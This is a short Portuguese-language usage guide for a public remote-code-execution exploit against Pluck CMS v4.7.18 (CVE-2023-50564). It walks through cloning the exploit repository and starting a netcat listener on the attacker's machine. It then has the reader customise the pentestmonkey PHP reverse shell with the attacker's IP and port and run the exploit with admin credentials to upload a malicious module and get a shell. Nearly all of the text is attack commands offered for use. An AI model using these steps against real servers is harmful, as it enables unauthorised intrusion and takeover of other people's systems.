
Pluck v4.7.18 - Execução Remota de Código (RCE)
Este exploit permite que um administrador autenticado no Pluck CMS v4.7.18 faça upload de um módulo ZIP malicioso contendo um shell PHP, resultando em execução remota de código (RCE).
installmodulegit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
Primeiro, o listener do reverse shell deve ser iniciado na máquina do atacante (esta aba do terminal não deve ser encerrada):
nc -nvlp <specify port>
Em seguida, baixe o php reverse shell de https://github.com/pentestmonkey/php-reverse-shell e personalize-o de acordo com a máquina do atacante. (IP, porta)
Execute o código do exploit em outra aba:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php